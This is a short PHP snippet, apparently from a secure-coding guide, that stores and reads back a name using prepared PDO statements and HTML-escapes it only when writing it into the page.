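// 1. Store: the placeholder keeps the value out of the SQL text.
$insert = $pdo->prepare('INSERT INTO t (name) VALUES (:name)');
$insert->execute([':name' => $name]);

// 2. Read back: the stored value is exactly what was submitted.
$select = $pdo->prepare('SELECT name FROM t WHERE name = :name');
$select->execute([':name' => $name]);
$stored = $select->fetchColumn();

// 3. Output: HTML-escape only at the moment of writing into the page.
echo '<p>Hello, ', htmlspecialchars($stored, ENT_QUOTES, 'UTF-8'), '!</p>', "\n";
```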
